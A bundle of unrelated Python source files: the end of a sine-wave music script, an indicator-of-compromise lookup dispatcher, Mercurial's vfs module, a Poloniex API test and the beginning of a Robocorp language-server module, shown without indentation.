if i == timesThroughBach - 1:
time.sleep(.25)
time.sleep(1.9)
for i in range(length):
for freq in freqs2:
sine_osc.play_frequencies(stream, .25, 1, 8000, 1000,
freq,
freq * 2,
freq + 2,
)
def func2():
print ('func2')
for i in range(timesThroughBach):
for freq in freqs:
sine_osc.play_frequencies(stream, .25, 1, 1000, 10000,
freq * 3/2,
freq * 3/2 * 2,
freq * 3/2,
freq / 2,
)
time.sleep(1.9)
for i in range(length):
for freq in freqs2:
sine_osc.play_frequencies(stream, .25, 1, 1000, 10000,
freq * 3/2,
freq * 3/2 * 2,
freq * 3/2,
freq / 2,
)
if __name__=='__main__':
mp.set_start_method('spawn')
p1 = mp.Process(target=func1)
p1.start()
time.sleep(2)
p2 = mp.Process(target=func2)
p2.start()
# time.sleep(4)
# p3 = mp.Process(target=func3)
# p3.start()
# I will pass you multiple series of notes and you will prepare to play them.
# When they are all ready, you will combine them and produce a single audio file.
# Phrases do not need to start at the same time.
# Phrases do not need to have any shared metrics.
# Rhythmic interaction will be described using mathematical relationships.
# Perhaps I can put a flag in one phrase that signals when a second phrase will start
# I can wait to start a phrase.
# I can put space in a phrase.
|
processing.py
|
#!/usr/bin/env python3
import model
import threading
from IPy import IP
import webbrowser as WB
from selenium import webdriver
class sanity():
def __init__(self, IoC):
self.types = ["d_", "u_", "i_"]
self.IoC = IoC
def check(self):
if self.__isIP__():
return self.types[2] # i_*
elif self.__isURL__():
return self.types[1] # u_*
else:
return self.types[0] # d_*
def __isIP__(self):
try:
IP(self.IoC)
except ValueError:
return False
return True
def __isURL__(self):
URL = ["%", "?", "=", "/", ":"]
for item in URL:
if item in self.IoC:
return True
return False
class worker():
def __init__(self, IoC, WORKING_SET, WORKING_OPT, user_choice):
self.BrowserDict = {
0:'mozilla', 1:'firefox', 2:'netscape', 3:'galeon', 4:'epiphany',
5:'skipstone', 6:'kfmclient', 7:'konqueror', 8:'kfm', 9:'mosaic',
10:'opera', 11:'grail', 12:'links', 13:'elinks', 14:'lynx',
15:'w3m', 16:'windows-default', 17:'macosx', 18:'safari', 19:'google-chrome',
20:'chrome', 21:'chromium', 22:'chromium-browser'
}
self.SeleniumDict = {
0:'Chrome', 1:'Edge', 2:'Firefox', 3:'Ie', 4:'Opera', 5:'Safari'
}
self.IoC = IoC
self.IoC_type = sanity(self.IoC).check()
self.WORKING_SET = []
self.WORKING_OPT = {}
self.user_choice = user_choice
for item in WORKING_SET:
self.WORKING_SET.append(item)
for key, val in WORKING_OPT.items():
self.WORKING_OPT[key] = val
self.scope(WORKING_SET, WORKING_OPT)
def scope(self, WORKING_SET, WORKING_OPT):
jobs_list = []
for key, value in self.BrowserDict.items():
WB.register(value, None, WB.BackgroundBrowser(self.WORKING_OPT[value+'_path']),key)
BR = WB.get(self.BrowserDict[int(self.WORKING_OPT['browser'])])
SE = getattr(webdriver, self.SeleniumDict[int(self.WORKING_OPT['selenium'])])
for WS in self.WORKING_SET:
if WS[0].startswith(self.IoC_type):
if int(WS[1]) == int(3) or int(WS[1]) == int(self.user_choice):
thread = threading.Thread(target=self.worker, args=(WS[0], BR, SE))
thread.setDaemon(True)
jobs_list.append(thread)
for j in jobs_list:
j.start()
def worker(self, name, BR, SE):
Methods = model.methods(self.WORKING_SET, self.WORKING_OPT, BR, SE)
trigger = getattr(Methods, name)
trigger(IoC=self.IoC) # this is the call
|
vfs.py
|
# vfs.py - Mercurial 'vfs' classes
#
# Copyright Matt Mackall <mpm@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
import contextlib
import errno
import os
import shutil
import stat
import threading
from .i18n import _
from . import (
encoding,
error,
pathutil,
pycompat,
util,
)
def _avoidambig(path, oldstat):
"""Avoid file stat ambiguity forcibly
This function causes copying ``path`` file, if it is owned by
another (see issue5418 and issue5584 for detail).
"""
def checkandavoid():
newstat = util.filestat.frompath(path)
# return whether file stat ambiguity is (already) avoided
return (not newstat.isambig(oldstat) or
newstat.avoidambig(path, oldstat))
if not checkandavoid():
# simply copy to change owner of path to get privilege to
# advance mtime (see issue5418)
util.rename(util.mktempcopy(path), path)
checkandavoid()
class abstractvfs(object):
"""Abstract base class; cannot be instantiated"""
def __init__(self, *args, **kwargs):
'''Prevent instantiation; don't call this from subclasses.'''
raise NotImplementedError('attempted instantiating ' + str(type(self)))
def tryread(self, path):
'''gracefully return an empty string for missing files'''
try:
return self.read(path)
except IOError as inst:
if inst.errno != errno.ENOENT:
raise
return ""
def tryreadlines(self, path, mode='rb'):
'''gracefully return an empty array for missing files'''
try:
return self.readlines(path, mode=mode)
except IOError as inst:
if inst.errno != errno.ENOENT:
raise
return []
@util.propertycache
def open(self):
'''Open ``path`` file, which is relative to vfs root.
Newly created directories are marked as "not to be indexed by
the content indexing service", if ``notindexed`` is specified
for "write" mode access.
'''
return self.__call__
def read(self, path):
with self(path, 'rb') as fp:
return fp.read()
def readlines(self, path, mode='rb'):
with self(path, mode=mode) as fp:
return fp.readlines()
def write(self, path, data, backgroundclose=False, **kwargs):
with self(path, 'wb', backgroundclose=backgroundclose, **kwargs) as fp:
return fp.write(data)
def writelines(self, path, data, mode='wb', notindexed=False):
with self(path, mode=mode, notindexed=notindexed) as fp:
return fp.writelines(data)
def append(self, path, data):
with self(path, 'ab') as fp:
return fp.write(data)
def basename(self, path):
"""return base element of a path (as os.path.basename would do)
This exists to allow handling of strange encoding if needed."""
return os.path.basename(path)
def chmod(self, path, mode):
return os.chmod(self.join(path), mode)
def dirname(self, path):
"""return dirname element of a path (as os.path.dirname would do)
This exists to allow handling of strange encoding if needed."""
return os.path.dirname(path)
def exists(self, path=None):
return os.path.exists(self.join(path))
def fstat(self, fp):
return util.fstat(fp)
def isdir(self, path=None):
return os.path.isdir(self.join(path))
def isfile(self, path=None):
return os.path.isfile(self.join(path))
def islink(self, path=None):
return os.path.islink(self.join(path))
def isfileorlink(self, path=None):
'''return whether path is a regular file or a symlink
Unlike isfile, this doesn't follow symlinks.'''
try:
st = self.lstat(path)
except OSError:
return False
mode = st.st_mode
return stat.S_ISREG(mode) or stat.S_ISLNK(mode)
def reljoin(self, *paths):
"""join various elements of a path together (as os.path.join would do)
The vfs base is not injected so that path stay relative. This exists
to allow handling of strange encoding if needed."""
return os.path.join(*paths)
def split(self, path):
"""split top-most element of a path (as os.path.split would do)
This exists to allow handling of strange encoding if needed."""
return os.path.split(path)
def lexists(self, path=None):
return os.path.lexists(self.join(path))
def lstat(self, path=None):
return os.lstat(self.join(path))
def listdir(self, path=None):
return os.listdir(self.join(path))
def makedir(self, path=None, notindexed=True):
return util.makedir(self.join(path), notindexed)
def makedirs(self, path=None, mode=None):
return util.makedirs(self.join(path), mode)
def makelock(self, info, path):
return util.makelock(info, self.join(path))
def mkdir(self, path=None):
return os.mkdir(self.join(path))
def mkstemp(self, suffix='', prefix='tmp', dir=None):
fd, name = pycompat.mkstemp(suffix=suffix, prefix=prefix,
dir=self.join(dir))
dname, fname = util.split(name)
if dir:
return fd, os.path.join(dir, fname)
else:
return fd, fname
def readdir(self, path=None, stat=None, skip=None):
return util.listdir(self.join(path), stat, skip)
def readlock(self, path):
return util.readlock(self.join(path))
def rename(self, src, dst, checkambig=False):
"""Rename from src to dst
checkambig argument is used with util.filestat, and is useful
only if destination file is guarded by any lock
(e.g. repo.lock or repo.wlock).
To avoid file stat ambiguity forcibly, checkambig=True involves
copying ``src`` file, if it is owned by another. Therefore, use
checkambig=True only in limited cases (see also issue5418 and
issue5584 for detail).
"""
srcpath = self.join(src)
dstpath = self.join(dst)
oldstat = checkambig and util.filestat.frompath(dstpath)
if oldstat and oldstat.stat:
ret = util.rename(srcpath, dstpath)
_avoidambig(dstpath, oldstat)
return ret
return util.rename(srcpath, dstpath)
def readlink(self, path):
return util.readlink(self.join(path))
def removedirs(self, path=None):
"""Remove a leaf directory and all empty intermediate ones
"""
return util.removedirs(self.join(path))
def rmdir(self, path=None):
"""Remove an empty directory."""
return os.rmdir(self.join(path))
def rmtree(self, path=None, ignore_errors=False, forcibly=False):
"""Remove a directory tree recursively
If ``forcibly``, this tries to remove READ-ONLY files, too.
"""
if forcibly:
def onerror(function, path, excinfo):
if function is not os.remove:
raise
# read-only files cannot be unlinked under Windows
s = os.stat(path)
if (s.st_mode & stat.S_IWRITE) != 0:
raise
os.chmod(path, stat.S_IMODE(s.st_mode) | stat.S_IWRITE)
os.remove(path)
else:
onerror = None
return shutil.rmtree(self.join(path),
ignore_errors=ignore_errors, onerror=onerror)
def setflags(self, path, l, x):
return util.setflags(self.join(path), l, x)
def stat(self, path=None):
return os.stat(self.join(path))
def unlink(self, path=None):
return util.unlink(self.join(path))
def tryunlink(self, path=None):
"""Attempt to remove a file, ignoring missing file errors."""
util.tryunlink(self.join(path))
def unlinkpath(self, path=None, ignoremissing=False, rmdir=True):
return util.unlinkpath(self.join(path), ignoremissing=ignoremissing,
rmdir=rmdir)
def utime(self, path=None, t=None):
return os.utime(self.join(path), t)
def walk(self, path=None, onerror=None):
"""Yield (dirpath, dirs, files) tuple for each directories under path
``dirpath`` is relative one from the root of this vfs. This
uses ``os.sep`` as path separator, even you specify POSIX
style ``path``.
"The root of this vfs" is represented as empty ``dirpath``.
"""
root = os.path.normpath(self.join(None))
# when dirpath == root, dirpath[prefixlen:] becomes empty
# because len(dirpath) < prefixlen.
prefixlen = len(pathutil.normasprefix(root))
for dirpath, dirs, files in os.walk(self.join(path), onerror=onerror):
yield (dirpath[prefixlen:], dirs, files)
@contextlib.contextmanager
def backgroundclosing(self, ui, expectedcount=-1):
"""Allow files to be closed asynchronously.
When this context manager is active, ``backgroundclose`` can be passed
to ``__call__``/``open`` to result in the file possibly being closed
asynchronously, on a background thread.
"""
# Sharing backgroundfilecloser between threads is complex and using
# multiple instances puts us at risk of running out of file descriptors
# only allow to use backgroundfilecloser when in main thread.
if not isinstance(threading.currentThread(), threading._MainThread):
yield
return
vfs = getattr(self, 'vfs', self)
if getattr(vfs, '_backgroundfilecloser', None):
raise error.Abort(
_('can only have 1 active background file closer'))
with backgroundfilecloser(ui, expectedcount=expectedcount) as bfc:
try:
vfs._backgroundfilecloser = bfc
yield bfc
finally:
vfs._backgroundfilecloser = None
class vfs(abstractvfs):
'''Operate files relative to a base directory
This class is used to hide the details of COW semantics and
remote file access from higher level code.
'cacheaudited' should be enabled only if (a) vfs object is short-lived, or
(b) the base directory is managed by hg and considered sort-of append-only.
See pathutil.pathauditor() for details.
'''
def __init__(self, base, audit=True, cacheaudited=False, expandpath=False,
realpath=False):
if expandpath:
base = util.expandpath(base)
if realpath:
base = os.path.realpath(base)
self.base = base
self._audit = audit
if audit:
self.audit = pathutil.pathauditor(self.base, cached=cacheaudited)
else:
self.audit = (lambda path, mode=None: True)
self.createmode = None
self._trustnlink = None
@util.propertycache
def _cansymlink(self):
return util.checklink(self.base)
@util.propertycache
def _chmod(self):
return util.checkexec(self.base)
def _fixfilemode(self, name):
if self.createmode is None or not self._chmod:
return
os.chmod(name, self.createmode & 0o666)
def __call__(self, path, mode="r", atomictemp=False, notindexed=False,
backgroundclose=False, checkambig=False, auditpath=True):
'''Open ``path`` file, which is relative to vfs root.
Newly created directories are marked as "not to be indexed by
the content indexing service", if ``notindexed`` is specified
for "write" mode access.
If ``backgroundclose`` is passed, the file may be closed asynchronously.
It can only be used if the ``self.backgroundclosing()`` context manager
is active. This should only be specified if the following criteria hold:
1. There is a potential for writing thousands of files. Unless you
are writing thousands of files, the performance benefits of
asynchronously closing files is not realized.
2. Files are opened exactly once for the ``backgroundclosing``
active duration and are therefore free of race conditions between
closing a file on a background thread and reopening it. (If the
file were opened multiple times, there could be unflushed data
because the original file handle hasn't been flushed/closed yet.)
``checkambig`` argument is passed to atomictemplfile (valid
only for writing), and is useful only if target file is
guarded by any lock (e.g. repo.lock or repo.wlock).
To avoid file stat ambiguity forcibly, checkambig=True involves
copying ``path`` file opened in "append" mode (e.g. for
truncation), if it is owned by another. Therefore, use
combination of append mode and checkambig=True only in limited
cases (see also issue5418 and issue5584 for detail).
'''
if auditpath:
if self._audit:
r = util.checkosfilename(path)
if r:
raise error.Abort("%s: %r" % (r, path))
self.audit(path, mode=mode)
f = self.join(path)
if "b" not in mode:
mode += "b" # for that other OS
nlink = -1
if mode not in ('r', 'rb'):
dirname, basename = util.split(f)
# If basename is empty, then the path is malformed because it points
# to a directory. Let the posixfile() call below raise IOError.
if basename:
if atomictemp:
util.makedirs(dirname, self.createmode, notindexed)
return util.atomictempfile(f, mode, self.createmode,
checkambig=checkambig)
try:
if 'w' in mode:
util.unlink(f)
nlink = 0
else:
# nlinks() may behave differently for files on Windows
# shares if the file is open.
with util.posixfile(f):
nlink = util.nlinks(f)
if nlink < 1:
nlink = 2 # force mktempcopy (issue1922)
except (OSError, IOError) as e:
if e.errno != errno.ENOENT:
raise
nlink = 0
util.makedirs(dirname, self.createmode, notindexed)
if nlink > 0:
if self._trustnlink is None:
self._trustnlink = nlink > 1 or util.checknlink(f)
if nlink > 1 or not self._trustnlink:
util.rename(util.mktempcopy(f), f)
fp = util.posixfile(f, mode)
if nlink == 0:
self._fixfilemode(f)
if checkambig:
if mode in ('r', 'rb'):
raise error.Abort(_('implementation error: mode %s is not'
' valid for checkambig=True') % mode)
fp = checkambigatclosing(fp)
if (backgroundclose and
isinstance(threading.currentThread(), threading._MainThread)):
if not self._backgroundfilecloser:
raise error.Abort(_('backgroundclose can only be used when a '
'backgroundclosing context manager is active')
)
fp = delayclosedfile(fp, self._backgroundfilecloser)
return fp
def symlink(self, src, dst):
self.audit(dst)
linkname = self.join(dst)
util.tryunlink(linkname)
util.makedirs(os.path.dirname(linkname), self.createmode)
if self._cansymlink:
try:
os.symlink(src, linkname)
except OSError as err:
raise OSError(err.errno, _('could not symlink to %r: %s') %
(src, encoding.strtolocal(err.strerror)),
linkname)
else:
self.write(dst, src)
def join(self, path, *insidef):
if path:
return os.path.join(self.base, path, *insidef)
else:
return self.base
opener = vfs
class proxyvfs(object):
def __init__(self, vfs):
self.vfs = vfs
@property
def options(self):
return self.vfs.options
@options.setter
def options(self, value):
self.vfs.options = value
class filtervfs(abstractvfs, proxyvfs):
'''Wrapper vfs for filtering filenames with a function.'''
def __init__(self, vfs, filter):
proxyvfs.__init__(self, vfs)
self._filter = filter
def __call__(self, path, *args, **kwargs):
return self.vfs(self._filter(path), *args, **kwargs)
def join(self, path, *insidef):
if path:
return self.vfs.join(self._filter(self.vfs.reljoin(path, *insidef)))
else:
return self.vfs.join(path)
filteropener = filtervfs
class readonlyvfs(abstractvfs, proxyvfs):
'''Wrapper vfs preventing any writing.'''
def __init__(self, vfs):
proxyvfs.__init__(self, vfs)
def __call__(self, path, mode='r', *args, **kw):
if mode not in ('r', 'rb'):
raise error.Abort(_('this vfs is read only'))
return self.vfs(path, mode, *args, **kw)
def join(self, path, *insidef):
return self.vfs.join(path, *insidef)
class closewrapbase(object):
"""Base class of wrapper, which hooks closing
Do not instantiate outside of the vfs layer.
"""
def __init__(self, fh):
object.__setattr__(self, r'_origfh', fh)
def __getattr__(self, attr):
return getattr(self._origfh, attr)
def __setattr__(self, attr, value):
return setattr(self._origfh, attr, value)
def __delattr__(self, attr):
return delattr(self._origfh, attr)
def __enter__(self):
self._origfh.__enter__()
return self
def __exit__(self, exc_type, exc_value, exc_tb):
raise NotImplementedError('attempted instantiating ' + str(type(self)))
def close(self):
raise NotImplementedError('attempted instantiating ' + str(type(self)))
class delayclosedfile(closewrapbase):
"""Proxy for a file object whose close is delayed.
Do not instantiate outside of the vfs layer.
"""
def __init__(self, fh, closer):
super(delayclosedfile, self).__init__(fh)
object.__setattr__(self, r'_closer', closer)
def __exit__(self, exc_type, exc_value, exc_tb):
self._closer.close(self._origfh)
def close(self):
self._closer.close(self._origfh)
class backgroundfilecloser(object):
"""Coordinates background closing of file handles on multiple threads."""
def __init__(self, ui, expectedcount=-1):
self._running = False
self._entered = False
self._threads = []
self._threadexception = None
# Only Windows/NTFS has slow file closing. So only enable by default
# on that platform. But allow to be enabled elsewhere for testing.
defaultenabled = pycompat.iswindows
enabled = ui.configbool('worker', 'backgroundclose', defaultenabled)
if not enabled:
return
# There is overhead to starting and stopping the background threads.
# Don't do background processing unless the file count is large enough
# to justify it.
minfilecount = ui.configint('worker', 'backgroundcloseminfilecount')
# FUTURE dynamically start background threads after minfilecount closes.
# (We don't currently have any callers that don't know their file count)
if expectedcount > 0 and expectedcount < minfilecount:
return
maxqueue = ui.configint('worker', 'backgroundclosemaxqueue')
threadcount = ui.configint('worker', 'backgroundclosethreadcount')
ui.debug('starting %d threads for background file closing\n' %
threadcount)
self._queue = pycompat.queue.Queue(maxsize=maxqueue)
self._running = True
for i in range(threadcount):
t = threading.Thread(target=self._worker, name='backgroundcloser')
self._threads.append(t)
t.start()
def __enter__(self):
self._entered = True
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self._running = False
# Wait for threads to finish closing so open files don't linger for
# longer than lifetime of context manager.
for t in self._threads:
t.join()
def _worker(self):
"""Main routine for worker thread."""
while True:
try:
fh = self._queue.get(block=True, timeout=0.100)
# Need to catch or the thread will terminate and
# we could orphan file descriptors.
try:
fh.close()
except Exception as e:
# Stash so can re-raise from main thread later.
self._threadexception = e
except pycompat.queue.Empty:
if not self._running:
break
def close(self, fh):
"""Schedule a file for closing."""
if not self._entered:
raise error.Abort(_('can only call close() when context manager '
'active'))
# If a background thread encountered an exception, raise now so we fail
# fast. Otherwise we may potentially go on for minutes until the error
# is acted on.
if self._threadexception:
e = self._threadexception
self._threadexception = None
raise e
# If we're not actively running, close synchronously.
if not self._running:
fh.close()
return
self._queue.put(fh, block=True, timeout=None)
class checkambigatclosing(closewrapbase):
"""Proxy for a file object, to avoid ambiguity of file stat
See also util.filestat for detail about "ambiguity of file stat".
This proxy is useful only if the target file is guarded by any
lock (e.g. repo.lock or repo.wlock)
Do not instantiate outside of the vfs layer.
"""
def __init__(self, fh):
super(checkambigatclosing, self).__init__(fh)
object.__setattr__(self, r'_oldstat', util.filestat.frompath(fh.name))
def _checkambig(self):
oldstat = self._oldstat
if oldstat.stat:
_avoidambig(self._origfh.name, oldstat)
def __exit__(self, exc_type, exc_value, exc_tb):
self._origfh.__exit__(exc_type, exc_value, exc_tb)
self._checkambig()
def close(self):
self._origfh.close()
self._checkambig()
|
test_PoloniexAPI.py
|
import time
import threading
# Hack to get relative imports - probably need to fix the dir structure instead but we need this at the minute for
# pytest to work
import os
import sys
import inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0, parentdir)
from coinlendingbot.Poloniex import Poloniex # nopep8
import coinlendingbot.Configuration as Config # nopep8
import coinlendingbot.Data as Data # nopep8
Config.init(open('poloniex_test.cfg'), Data)
api = Poloniex(Config, None)
def test_ticker():
ticker = api.return_ticker()
assert ticker['BTC_XMR']['lowestAsk']
def test_open_loan_offers():
offers = api.return_open_loan_offers()
def multiple_api_queries(n):
try:
for i in range(n):
print("Thread {}".format(i + 1))
thread1 = threading.Thread(target=call_get_open_loan_offers, args=[(i+1)])
thread1.start()
except Exception as e:
assert False, 'api_query ' + str(i + 1) + ':' + e.message
# Test fast api calls
def test_multiple_calls():
multiple_api_queries(270)
def call_get_open_loan_offers(i):
api.return_open_loan_offers()
print("API Call {} sec: {} - {}".format(i, time.time(), start_time))
|
python_ls.py
|
# Original work Copyright 2017 Palantir Technologies, Inc. (MIT)
# See ThirdPartyNotices.txt in the project root for license information.
# All modifications Copyright (c) Robocorp Technologies Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
from robocorp_ls_core.robotframework_log import get_logger
from robocorp_ls_core.protocols import IConfig, IWorkspace
from typing import Optional
import socketserver
import threading
from robocorp_ls_core.jsonrpc.dispatchers import MethodDispatcher
from robocorp_ls_core.jsonrpc.endpoint import Endpoint
from robocorp_ls_core.jsonrpc.streams import JsonRpcStreamReader, JsonRpcStreamWriter
from robocorp_ls_core import uris
from robocorp_ls_core.watchdog_wrapper import IFSObserver
from robocorp_ls_core.options import DEFAULT_TIMEOUT, USE_TIMEOUTS, NO_TIMEOUT
log = get_logger(__name__)
class _StreamHandlerWrapper(socketserver.StreamRequestHandler, object):
"""A wrapper class that is used to construct a custom handler class."""
delegate = None
def setup(self):
super(_StreamHandlerWrapper, self).setup()
self.delegate = self.DELEGATE_CLASS(self.rfile, self.wfile) # noqa
def handle(self):
try:
self.delegate.start()
except OSError as e:
if os.name == "nt":
# Catch and pass on ConnectionResetError when parent process
# dies
if isinstance(e, WindowsError) and e.winerror == 10054:
pass
self.SHUTDOWN_CALL() # noqa
class _DummyStdin(object):
def __init__(self, original_stdin=sys.stdin, *args, **kwargs):
try:
self.encoding = sys.stdin.encoding
except:
# Not sure if it's available in all Python versions...
pass
self.original_stdin = original_stdin
try:
self.errors = (
sys.stdin.errors
) # Who knew? sys streams have an errors attribute!
except:
# Not sure if it's available in all Python versions...
pass
def readline(self, *args, **kwargs):
return "\n"
def read(self, *args, **kwargs):
return self.readline()
def write(self, *args, **kwargs):
pass
def flush(self, *args, **kwargs):
pass
def close(self, *args, **kwargs):
pass
def binary_stdio():
"""Construct binary stdio streams (not text mode).
This seems to be different for Window/Unix Python2/3, so going by:
https://stackoverflow.com/questions/2850893/reading-binary-data-from-stdin
"""
PY3K = sys.version_info >= (3, 0)
if PY3K:
stdin, stdout = sys.stdin.buffer, sys.stdout.buffer
else:
# Python 2 on Windows opens sys.stdin in text mode, and
# binary data that read from it becomes corrupted on \r\n
if sys.platform == "win32":
# set sys.stdin to binary mode
import msvcrt
msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
stdin, stdout = sys.stdin, sys.stdout
sys.stdin, sys.stdout = (_DummyStdin(), open(os.devnull, "w"))
return stdin, stdout
def start_tcp_lang_client(host, port, handler_class):
import socket as socket_module
if not issubclass(handler_class, MethodDispatcher):
raise ValueError("Handler class must be an instance of MethodDispatcher")
log.info("Connecting to %s:%s", host, port)
s = socket_module.socket(socket_module.AF_INET, socket_module.SOCK_STREAM)
# Set TCP keepalive on an open socket.
# It activates after 1 second (TCP_KEEPIDLE,) of idleness,
# then sends a keepalive ping once every 3 seconds (TCP_KEEPINTVL),
# and closes the connection after 5 failed ping (TCP_KEEPCNT), or 15 seconds
try:
s.setsockopt(socket_module.SOL_SOCKET, socket_module.SO_KEEPALIVE, 1)
except (AttributeError, OSError):
pass # May not be available everywhere.
try:
s.setsockopt(socket_module.IPPROTO_TCP, socket_module.TCP_KEEPIDLE, 1)
except (AttributeError, OSError):
pass # May not be available everywhere.
try:
s.setsockopt(socket_module.IPPROTO_TCP, socket_module.TCP_KEEPINTVL, 3)
except (AttributeError, OSError):
pass # May not be available everywhere.
try:
s.setsockopt(socket_module.IPPROTO_TCP, socket_module.TCP_KEEPCNT, 5)
except (AttributeError, OSError):
pass # May not be available everywhere.
try:
# 10 seconds default timeout
s.settimeout(DEFAULT_TIMEOUT if USE_TIMEOUTS else NO_TIMEOUT)
s.connect((host, port))
s.settimeout(None) # no timeout after connected
log.info("Connected.")
except:
log.exception("Could not connect to %s: %s", host, port)
raise
log.info(
"Starting %s IO language server. pid: %s", handler_class.__name__, os.getpid()
)
rfile = s.makefile("rb")
wfile = s.makefile("wb")
server = handler_class(rfile, wfile)
server.start()
def start_tcp_lang_server(
bind_addr, port, handler_class, after_bind=lambda server: None
):
"""
:param bind_addr:
:param port:
:param handler_class:
:param after_bind:
Called right after server.bind (so, it's possible to get the port with
server.socket.getsockname() if port 0 was passed).
"""
def create_handler(_, *args, **kwargs):
method_dispatcher = handler_class(*args, **kwargs)
if not isinstance(method_dispatcher, MethodDispatcher):
raise ValueError("Handler class must be an instance of MethodDispatcher")
return method_dispatcher
def shutdown_server(*args):
log.debug("Shutting down server")
# Shutdown call must be done on a thread, to prevent deadlocks
stop_thread = threading.Thread(target=server.shutdown)
stop_thread.start()
# Construct a custom wrapper class around the user's handler_class
wrapper_class = type(
handler_class.__name__ + "Handler",
(_StreamHandlerWrapper,),
{"DELEGATE_CLASS": create_handler, "SHUTDOWN_CALL": shutdown_server},
)
server = socketserver.TCPServer(
(bind_addr, port), wrapper_class, bind_and_activate=False
)
server.allow_reuse_address = True
try:
server.server_bind()
server.server_activate()
after_bind(server)
log.info(
"Serving %s on (%s, %s) - pid: %s",
handler_class.__name__,
bind_addr,
port,
os.getpid(),
)
server.serve_forever()
finally:
log.info("Shutting down")
server.server_close()
def start_io_lang_server(rfile, wfile, handler_class):
if not issubclass(handler_class, MethodDispatcher):
raise ValueError("Handler class must be an instance of MethodDispatcher")
log.info(
"Starting %s IO language server. pid: %s", handler_class.__name__, os.getpid()
)
server = handler_class(rfile, wfile)
server.start()
class PythonLanguageServer(MethodDispatcher):
"""Implementation of the Microsoft VSCode Language Server Protocol
https://github.com/Microsoft/language-server-protocol/blob/master/versions/protocol-1-x.md
Based on: https://github.com/palantir/python-language-server/blob/develop/pyls/python_ls.py
"""
def __init__(self, read_stream, write_stream):
from robocorp_ls_core.lsp import LSPMessages
self._config: IConfig = self._create_config()
self._workspace: Optional[IWorkspace] = None
self.root_uri = None
self.watching_thread = None
self.uri_workspace_mapper = {}
self._jsonrpc_stream_reader = JsonRpcStreamReader(read_stream)
self._jsonrpc_stream_writer = JsonRpcStreamWriter(write_stream)
self._endpoint = Endpoint(self, self._jsonrpc_stream_writer.write)
self._lsp_messages = LSPMessages(self._endpoint)
self._shutdown = False
@property
def workspace(self) -> Optional[IWorkspace]:
return self._workspace
@workspace.setter
def workspace(self, workspace: IWorkspace) -> None:
self._workspace = workspace
self._config.set_workspace_dir(workspace.root_path)
self._on_workspace_set(workspace)
def _on_workspace_set(self, workspace: IWorkspace):
pass
@property # i.e.: read-only
def config(self) -> IConfig:
return self._config
def start(self):
"""Entry point for the server."""
self._jsonrpc_stream_reader.listen(self._endpoint.consume)
def m_shutdown(self, **_kwargs):
self._shutdown = True
def m_exit(self, **_kwargs):
self._endpoint.shutdown()
# If there's someone reading, we could deadlock here.
self._jsonrpc_stream_reader.close()
self._jsonrpc_stream_writer.close()
def capabilities(self):
return {} # Subclasses should override for capabilities.
def m_initialize(
self,
processId=None,
rootUri=None,
rootPath=None,
initializationOptions=None,
workspaceFolders=None,
**_kwargs,
) -> dict:
from robocorp_ls_core.basic import exit_when_pid_exists
from robocorp_ls_core.lsp import WorkspaceFolder
log.debug(
"Language server initialized with:\n processId: %s\n rootUri: %s\n rootPath: %s\n initializationOptions: %s\n workspaceFolders: %s",
processId,
rootUri,
rootPath,
initializationOptions,
workspaceFolders,
)
if rootUri is None:
rootUri = uris.from_fs_path(rootPath) if rootPath is not None else ""
self.root_uri = rootUri
if workspaceFolders:
workspaceFolders = [WorkspaceFolder(**w) for w in workspaceFolders]
self.workspace = self._create_workspace(
rootUri, self._obtain_fs_observer(), workspaceFolders or []
)
if processId not in (None, -1, 0):
exit_when_pid_exists(processId)
# Get our capabilities
return {"capabilities": self.capabilities()}
def _obtain_fs_observer(self) -> IFSObserver:
"""
The FSObserver is needed to keep the list of files updated in the
Workspace (_VirtualFS).
"""
try:
return self._observer
except AttributeError:
from robocorp_ls_core import watchdog_wrapper
self._observer = watchdog_wrapper.create_observer("dummy", None)
return self._observer
def _create_config(self) -> IConfig:
raise NotImplementedError(f"Not implemented in: {self.__class__}")
def _create_workspace(
self, root_uri: str, fs_observer: IFSObserver, workspace_folders
) -> IWorkspace:
from robocorp_ls_core.workspace import Workspace
return Workspace(root_uri, fs_observer, workspace_folders)
def m_initialized(self, **_kwargs):
pass
def lint(self, doc_uri, is_saved):
raise NotImplementedError(
"Subclasses must override (current class: %s)." % (self.__class__,)
)
def cancel_lint(self, doc_uri):
raise NotImplementedError(
"Subclasses must override (current class: %s)." % (self.__class__,)
)
def m_text_document__did_close(self, textDocument=None, **_kwargs) -> None:
ws = self.workspace
doc_uri = textDocument["uri"]
if ws is not None:
ws.remove_document(doc_uri)
self.cancel_lint(doc_uri)
def m_text_document__did_open(self, textDocument=None, **_kwargs) -> None:
from robocorp_ls_core.lsp import TextDocumentItem
ws = self.workspace
if ws is not None:
ws.put_document(TextDocumentItem(**textDocument))
self.lint(textDocument["uri"], is_saved=True)
def m_text_document__did_change(
self, contentChanges=None, textDocument=None, **_kwargs
):
from robocorp_ls_core.lsp import TextDocumentItem
from robocorp_ls_core.lsp import TextDocumentContentChangeEvent
if contentChanges:
text_document_item = TextDocumentItem(**textDocument)
for change in contentChanges:
try:
range = change.get("range", None)
range_length = change.get("rangeLength", 0)
text = change.get("text", "")
self.workspace.update_document(
text_document_item,
TextDocumentContentChangeEvent(
range=range, rangeLength=range_length, text=text
),
)
except:
log.exception(
"Error updating document: %s with changes: %s"
% (textDocument, contentChanges)
)
self.lint(textDocument["uri"], is_saved=False)
def m_text_document__did_save(self, textDocument=None, **_kwargs):
self.lint(textDocument["uri"], is_saved=True)
def m_workspace__did_change_configuration(self, settings=None) -> None:
self.config.update(settings or {})
def m_workspace__did_change_workspace_folders(self, event=None):
"""Adds/Removes folders from the workspace."""
from robocorp_ls_core.lsp import WorkspaceFolder
log.info(f"Workspace folders changed: {event}")
added_folders = []
removed_folders = []
if event:
added_folders = event.get("added", [])
removed_folders = event.get("removed", [])
